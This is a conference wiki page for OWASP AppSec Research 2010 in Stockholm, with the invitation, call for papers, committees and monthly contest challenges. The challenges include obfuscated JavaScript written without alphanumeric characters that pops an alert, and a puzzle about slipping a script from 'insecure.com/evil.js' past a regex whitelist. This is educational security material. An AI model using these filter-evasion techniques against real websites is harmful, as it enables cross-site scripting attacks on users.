OWASP AppSec Research 2010 - Stockholm, Sweden

Invitation
Ladies and Gentlemen,

In June 21-24, 2010 let's all meet in beautiful Stockholm, Sweden. The OWASP chapters in Sweden, Norway, and Denmark hereby invite you to OWASP AppSec Research 2010.

If you have any questions, please email the conference chair: john.wilander at owasp.org



Sponsors
Diamond sponsor: Position open

Gold sponsors (2 taken, 2 open):

Silver sponsors: 8 positions open

For full sponsoring program see the Sponsoring tab above.

"AppSec Research".equals("AppSec Europe")
This conference was formerly known as OWASP AppSec Europe. We have added 'Research' to highlight that we invite both industry and academia. All the regular AppSec Europe visitors and topics are welcome along with contributions from universities and research institutes.

This will be the European conference for anyone interested in or working with application security. Co-host is the Department of Computer and Systems Science at Stockholm University, offering a great venue in the fabulous Aula Magna.

Countdown Challenges -- Free Tickets to Win!
There will be a challenge posted on the conference wiki page the 21st every month up until the event. The winner will get free entrance to the conference. What are you waiting for? Go to the Challenges tab and have fun!

Organizing Committee
• John Wilander, chapter leader Sweden (chair) • Mattias Bergling (vice chair) • Alan Davidson, Stockholm University/Royal Institute of Technology (co-host) • Ulf Munkedal, chapter leader Denmark • Kåre Presttun, chapter leader Norway • Stefan Pettersson (sponsoring coordinator) • Carl-Johan Bostorp (schedule and event coordinator) • Martin Holst Swende (coffee/lunch/dinner) • Kate Hartmann, OWASP • Sebastien Deleersnyder, OWASP Board

Welcome to Stockholm next year! Regards, John Wilander

Call for Papers and Proposals
We offer two options: 1. Full papers. Peer-reviewed 12 page papers that will be published in formal proceedings by Springer-Verlag Lecture Notes in Computer Science (final approval pending). 2. Presentation proposals. A presentation proposal should consist of a 2-page position paper representing the essential matter proposed by the speaker(s). Proposals must include sufficient material for the reviewers to make an informed decision.

Topics of Interest
We encourage the publication and presentation of new tools, new methods, empirical data, novel ideas, and lessons learned in the following areas: •   Web application security •    Security aspects of new/emerging web technologies/paradigms (mashups, web 2.0,  offline support, etc) •    Security in web services, REST, and service oriented architectures •    Security in cloud-based services •    Security of frameworks (Struts, Spring, ASP.Net MVC etc) •    New security features in platforms or languages •    Next-generation browser security •    Security for the mobile web •    Secure application development (methods, processes etc) •    Threat modeling of applications •    Vulnerability analysis (code review, pentest, static analysis etc) •    Countermeasures for application vulnerabilities •    Metrics for application security •    Application security awareness and education

Submission Deadline and Instructions
Submission deadline is Sunday February 7th 23:59 (Apia, Samoa time). Submissions should be at most 12 pages long in the Springer LNCS style for "Proceedings and Other Multiauthor Volumes". Templates for preparing papers in this style for LaTeX, Word, etc can be downloaded from: http://www.springer.com/computer/lncs?SGWID=0-164-7-72376-0. Full papers must be submitted in a form suitable for anonymous review: remove author names and affiliations from the title page, and avoid explicit self-referencing in the text.

Program Committee
• John Wilander, Omegapoint and Linköping University (chair) • Alan Davidson, Stockholm University/Royal Institute of Technology (co-host) • Andrei Sabelfeld, Chalmers UT • Engin Kirda, Institute Eurecom • Lieven Desmet, Katholieke Universiteit Leuven • Martin Johns, University of Passau • Christoph Kern, Google • Sergio Maffeis, Imperial College London • Ulf Lindqvist, SRI International • William Robertson, UC Santa Barbara

Training
To be filled in.

Venue
Aula Magna, Stockholm University

To be filled in.

Sponsoring
We are now welcoming sponsors for OWASP AppSec Research 2010. Take the opportunity to support next year's major appsec event in Europe! The full sponsoring program is available as pdfs:

Sponsoring program in English:

Sponsoring program in Swedish:



Countdown Challenges -- Free Tickets to Win!
There will be a challenge posted on the conference wiki page the 21st every month up until the event. The winner will get free entrance to the conference. Be sure to sign up for the conference mailing list to get a monthly reminder.

AppSec Research Challenge 4: Who's Who in Security?
This month's AppSec Research 2010 Challenge is to identify a number of people that are, in one way or another, known in the security business, by their picture.

There are thirteen photos in total, portraiting thirteen different individuals. Below, you will find a list of suggested names. As you can tell, there are more than thirteen names so yeah, there are a few false positives :).

Answers should be submitted to Stefan Pettersson  as a simple list of picture-to-name mappings. The first correct answer will be awarded free entrance for one to OWASP AppSec Research 2010 in Stockholm.

The Names
Dinis Cruz, Gordon "Fyodor" Lyon, David Litchfield, Dave Aitel, Bruce Schneier, Dave Wichers, Gene Spafford, MafiaBoy, MySpace Samy, Tom Brennan, Halvar Flake, Alex Sotirov, Jeff Williams, Jennifer Granick, Kate Hartmann, Mudge, Lance Spitzner, Dan Kaminsky, Brian Chess, Joanna Rutkowska, Crispin Cowan, Michael Howard, Jay Beale, Ross Anderson, Dawn Song, Robert "rsnake" Hansen, and Solar Designer.

AppSec Research Challenge 3: Non-Alphanumeric JavaScript
The August AppSec Research 2010 Challenge was to create a JavaScript alert("owasp") that pops up the word 'owasp', case-insensitive, without using any alphanumeric characters (0-9a-zA-Z). There was a tremendous activity and we want to thank everyone who participated. The size of the final result was almost a third of the first entry (see chart below). '''Want to check out the winning snippet by .mario? Enter the following in the Firebug console': ω=[[Ṫ,Ŕ,,É,,Á,Ĺ,Ś,,,Ó,Ḃ]=!+[!{}]+{}][Ś+Ó+Ŕ+Ṫ],ω[Á+Ĺ+É+Ŕ+Ṫ](Ó+ω[Ḃ+Ṫ+Ó+Á]('Á«)'))

It is based on a few different ideas. First of all, a variable assignment on the form

[a,b,c,,e]="abcde" // a="a", c="c",e="e"

Which is performed on the string "truefalse[object Object]"

[Ṫ,Ŕ,,É,,Á,Ĺ,Ś,,,Ó,Ḃ]=!''+[!{}]+{}] // right-hand side is "truefalse[object Object]"

Also, the following construction obtains the window.sort-function, which leaks the window-object when called without arguments :

ω=[]["sort"] //ω is now window.sort

Therefore, calling ω["alert"] invokes window.alert. To generate the string "owasp", the string "wasp" can be obtained by calling btoa on the characters "Á«)".

This was really a great team effort, and I think a lot of us learned some new tricks. The final winner was .mario. Congratulations!



JavaScript Without Alphanumeric Characters?
It is possible to write valid javascript completely without alphannumeric characters (0-9a-zA-Z). To produce a number, you can instead use for example an empty string, , interpret it as a boolean with a bang: ! -- which leads to the boolean object true. true, interpreted as a numeric value, equals one. Thus,

$ = +!''; // $ === 1

$++;$++; // $ === 3

In a similar fashion, strings can be created from strings embedded in the language. The boolean object true can be converted to string by concatenation, and then accessed by numeric index to, for example, produce the letter 'e' :

â = (!+)[$] // â[$] === "true"[3] === e

Previous Similar Contest
These two techniques are behind a previous contest at the forum "sla.ckers.org", where the contest was to create alert(1) with as few non-alphanumeric characters as possible. Currently, the code actually being executed was:

([],"sort")["alert"](1) // since ([],"sort") leaks window object in FF, ==&gt; window["alert"](1) is called, which is another form of window.alert(1)

The winner, or at least current leading entry is 84 bytes long, and looks like this:

(Å='',[Į=!(ĩ=!Å+Å)+{}][Į[Š=ĩ[++Å]+ĩ[Å-Å],Č=Å-~Å]+Į[Č+Č]+Š])[Į[Å]+Į[Å+Å]+ĩ[Č]+Š](Å)

The Challenge
August's challenge was to, in a similar fashion, create an alert("owasp"), case-insensitive, not using any alphanumeric characters. The shortest working code snippet submitted by September 18th 23:59:59 UTC won a free ticket. By "working" we meant JavaScript that executes in Firefox/Firebug, not depending on any Firebug DOM variables for execution.

Submissions were made as comments to the challenge 3 blogpost on Owasp Sweden. Check it out.

AppSec Research Challenge 2: OWASP Crossword Puzzle
July's crossword challenge is over. Many permutations arrived in our inbox but it was tricky to get it completely right. Congratulations to Johannes Dahse and Johan Nilsson who in the end were allowed to join forces to be able to find the correct solution. They win a 50 % conference ticket discount each.

You find the solution below.



AppSec Research Challenge 1: Input Validation and Regular Expressions
This challenge is over. The winner was Partik Nordlén. To see the solution(s), please visit the appsec_eu_2010 mailing list archive.

Some people, when confronted with a problem, think “I know, I'll use regular expressions.” Now they have two problems.        --Jamie Zawinski, in comp.emacs.xemacs

The 21st of each month up until the conference in June 2010 we'll have a countdown challenge posted here. The winner each month will get a free entrance ticket worth about €300/$400. Be sure to sign up for the conference mailing list to get a monthly reminder.

The Challenge
A community is hosted on a very large domain, yahoogle.com. The users of that community all have profiles, where they are allowed to use basic HTML for customization, as well as JavaScript files hosted on the domain.

All the code for the profile pages are filtered on the server side, and whenever a piece of code containing "&lt;script..." is encountered, the following regular expression is used to validate that the script loaded is hosted on a subdomain of yahoogle.com:

.*(&lt;script){1}([^&gt;]+)src=('http:\/\/[a-zA-Z]+.yahoogle.com\/scripts\/[0-9A-Za-z]+\.js').*\/&gt;

Capture group 3 is then also checked against a whitelist of allowed scripts on that domain. The whitelist consists of "http://secure.yahoogle.com" and "http://scripts.yahoogle.com".

Your task is to formulate a snippet of HTML that goes correctly through the filter and the whitelist, but loads the script "http://insecure.com/evil.js" instead. Also, rework the regular expression to defend against your "attack".

Email your solution to Martin Holst Swende &lt;martin.holst_swende@owasp.org&gt;. The first correct answer wins a free ticket to the conference. The free ticket is personal and the judgement of the organizing committee can not be overruled :).